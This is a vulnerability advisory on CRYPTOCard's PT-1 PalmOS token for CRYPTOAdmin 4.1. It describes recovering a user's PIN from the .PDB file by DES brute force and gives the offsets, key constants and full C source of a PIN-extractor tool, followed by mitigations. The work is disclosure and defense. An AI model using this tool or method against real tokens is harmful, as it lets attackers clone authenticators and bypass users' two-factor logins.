COMMAND
CRYPTOAdmin server
SYSTEMS AFFECTED
CRYPTOAdmin 4.1 server with CRYPTOCard PT-1 token 1.04
PROBLEM
Following is based L0pht Research Labs Security Advisory by
Kingpin and Dildog. CRYPTOCard's CRYPTOAdmin software is a user
authentication administration system which uses various hardware
and software token devices for challenge/response. Using the
user's PIN number ("what you know") and the token ("what you
have"), the correct response will be calculated based on the
challenge prompted from the CRYPTOAdmin server.
The PT-1 token, which runs on a PalmOS device, generates the
one-time-password response. A PalmOS .PDB file is created by the
CRYPTOAdmin software for each user. The .PDB file is loaded onto
the Palm device. The user name, serial number, key, and PIN
number are all stored in this file in either encrypted or
plaintext form. By gaining access to the .PDB file, the
legitimate user's PIN can be determined through a series of DES
decrypts-and-compares.
Having both the .PDB and the PIN number will allow an attacker to
clone the token on another Palm device and generate the proper
responses given the challenge from the CRYPTOAdmin server. Using
the demonstration tool below, the PIN can be determined in under
5 minutes on a Pentium III 450MHz.
The PalmOS PT-1 application requires the user to enter their PIN
number before the challenge/response information is granted. If
the .PDB file of the legitimate users gets into the hands of an
attacker, they will easily be able to extract the legitimate PIN
using the demonstration tool below.
The PalmOS platform is inherently insecure and was not designed
for security-related applications. Any application and database
information can be accessed and modified by any other application.
In the past, tokens used to generate one-time-passwords were often
tamper-evident hardware devices. These devices are difficult to
reverse-engineer and will sometimes erase critical information if
tampering is detected. The software token, such as the PT-1 Palm
token, allows the functionality of a previously secure device to
be executed on an insecure platform. Methods to determine program
operation is much easier in this fashion, making the software
tokens less secure and causing a weak link in the security chain.
The .PDB file, containing the critical information, can be
accessed from either the user's desktop PC or Palm device. PalmOS
HotSync often stores a copy of the application, once sync'ed to
the Palm, in the /Palm/<user>/Backup directory. If a new .PDB file
is pending for sync to the Palm, it is stored in the
/Palm/<user>/Install directory.
If an attacker has temporary access to the user's Palm, they can
transfer the .PDB file to their own Palm device using the PalmOS
"Beam" functionality. CRYPTOCard intentionally prevents the
beaming of their database by setting the PalmOS lock bit, but
using BeamCrack, a L0pht Heavy Industries tool, the lock bit can
be removed and the database can be beamed.
The information we need from the .PDB, which is an 8-byte
ciphertext string, is located from address $BD to $C4. Simply
open the .PDB file in a hex editor to extract the bytes.
The DES key is generated based on the entered PIN number and a
fixed 4-byte value, $247E 3E6C. If the administrator issues PINs
with less than 8 digits, the PIN is padded up to 8 digits with
45678 (i.e. if PIN is 9999, it will be padded to be 99995678)
before the DES key is generated.
If the entered PIN is correct, the DES decrypt will output a
plaintext of $636A 2A3F 256D 676C. If the entered PIN is
incorrect, the plaintext output will be different, since the key
used to decrypt the information was incorrect.
ciphertext from .PDB -> DES Decrypt -> plaintext known
^
|
key = (entered PIN) w/ fixed value
An example PIN authentication routine is as follows:
1) Ciphertext from .PDB = $11FB 32C3 80EE 9318
2) Entered PIN number * 9 = 26745678 * 9 = $0E58 F5BE
3) Key = $0E58 F5BE 247E 3E6C
4) DES decrypt -> plaintext = $636A 2A3F 256D 676C
5) If plaintext = $636A 2A3F 256D 676C, PIN is good!
By creating a key based on each possible 8-digit PIN, ranging
from 00000000 to 99999999, and performing decrypt-and-compare, the
PIN can be brute-forced in a trivial amount of time. On a Pentium
III 450MHz running Windows NT 4.0, the 100,000,000 PIN attempts
can be completed in under 5 minutes.
The demonstration tool, in form of an application, has been
written for both Unix and Windows PC platforms. Source code for
Unix, which uses Eric Young's libdes library, is below. The PC
version can be found at
http://www.L0pht.com/~kingpin
The code:
#include<stdio.h>
#include<des.h>
int main(int argc, char **argv)
{
des_cblock in,out,key,valid = {0x63, 0x6A, 0x2A, 0x3F,
0x25, 0x6D, 0x67, 0x6C};
des_key_schedule sched;
unsigned long massaged;
FILE *pdb;
if (argc == 1)
{
fprintf(stdout, "\nUsage: %s <.PDB filename>\n\n", argv[0]);
return 1;
}
fprintf(stdout, "\nCRYPTOCard PT-1 PIN Extractor\n");
fprintf(stdout, "kingpin@atstake.com\n");
fprintf(stdout, "@Stake L0pht Research Labs\n");
fprintf(stdout, "http://www.atstake.com\n\n");
if((pdb = fopen(argv[1], "rb")) == NULL)
{
fprintf(stderr, "Missing input file %s.\n\n", argv[1]);
return 1;
}
fseek(pdb, 189L, SEEK_SET);
if (fread(in, 1, 8, pdb) != 8)
{
fprintf(stderr, "Error getting ciphertext string.\n\n");
return 1;
}
fclose(pdb);
key[4] = 0x24;
key[5] = 0x7E;
key[6] = 0x3E;
key[7] = 0x6C;
for (massaged = 0; massaged < 900000000; massaged += 9)
{
key[0]=(massaged>>24) & 0xff;
key[1]=(massaged>>16) & 0xff;
key[2]=(massaged>>8) & 0xff;
key[3]=(massaged) & 0xff;
des_set_key(&key,sched);
des_ecb_encrypt(&in,&out,sched,DES_DECRYPT);
if (memcmp(out, valid, 8) == 0)
{
fprintf(stdout, "\n\nPIN: %d", massaged/9);
break;
}
if ((massaged % 900000) == 0)
{
fprintf(stdout, "#");
fflush(stdout);
}
}
fprintf(stdout, "\n\n");
return 0;
}
SOLUTION
The quick solution, although it does not remedy the core problem,
is to confirm that the .PDB file is not stored on the user's
desktop machine after it has been loaded onto the PalmOS device.
A global find for *.PDB will enable you to find all .PDB files on
the user's machine. It is highly recommended that extreme caution
is taken to prevent compromise of the .PDB files.
Changing the PIN numbers on a daily or weekly basis is also
recommended.
A longer term solution, especially if the PT-1 tokens are already
deployed, would be to move to a tamper-evident hardware token,
such as the CRYPTOCard RB-1 or KF-1 devices. These physical
pieces of hardware are much more secure, due to the fact that
they are dedicated to one function and it is more difficult to
extract the PIN information from the devices.